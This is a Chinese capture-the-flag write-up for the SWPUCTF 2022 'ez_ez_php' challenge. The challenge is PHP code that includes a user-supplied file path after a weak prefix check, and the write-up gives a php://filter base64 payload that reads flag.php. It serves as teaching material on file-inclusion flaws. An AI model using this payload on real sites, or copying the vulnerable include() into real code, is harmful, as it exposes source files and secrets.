[SWPUCTF 2022 新生赛]ez_ez_php

[SWPUCTF 2022 新生赛]ez_ez_php wp

题目代码如下:

复制代码
 <?php
error_reporting(0);
if (isset($_GET['file'])) {
    if ( substr($_GET["file"], 0, 3) === "php" ) {
        echo "Nice!!!";
        include($_GET["file"]);
    } 

    else {
        echo "Hacker!!";
    }
}else {
    highlight_file(__FILE__);
}
//flag.php

根据代码,GET 传入的参数要以 php 开头,并且提示有一个 flag.php 文件。那就直接用 php 伪协议。

php://filter 伪协议

payload

复制代码
file=php://filter/read=convert.base64-encode/resource=flag.php

返回结果:

base64 解码后得到 flag.php 文件内容:

这里有些乱码,但可以看得出来提示:真正的 flag 在名为 'flag' 的文件里面。

那就用伪协议再读一次:

拿到 flag 。

相关推荐
恃宠而骄的佩奇14 小时前
APP客户端安全评估思路及工具分享
测试工具·安全·网络安全·app客户端安全评估
吉吉6115 小时前
在 Windows 和 Linux 的 VSCode 中配置 PHP Debug
开发语言·php
夜未央3115 小时前
HTTPS 原理与 PHP 文件包含及伪协议详解
运维·服务器·安全·网络安全
云安全干货局16 小时前
深度解析:高防 IP 如何实现 “隐藏源站 IP”?核心技术原理拆解
网络·网络安全·高防ip
catchadmin16 小时前
PHP 8.5 闭包和一等可调用对象进入常量表达式
php
JaguarJack16 小时前
2026 年 PHP 函数式编程 优势与实际应用
后端·php·服务端
zorro_z16 小时前
ThinkPHP8学习篇(十五):验证
php
祁白_16 小时前
文件包含笔记整理
笔记·学习·安全·web安全
wr20051416 小时前
渗透笔记和疑惑
开发语言·php
Y_cheng_16 小时前
php环境配置与伪协议
开发语言·php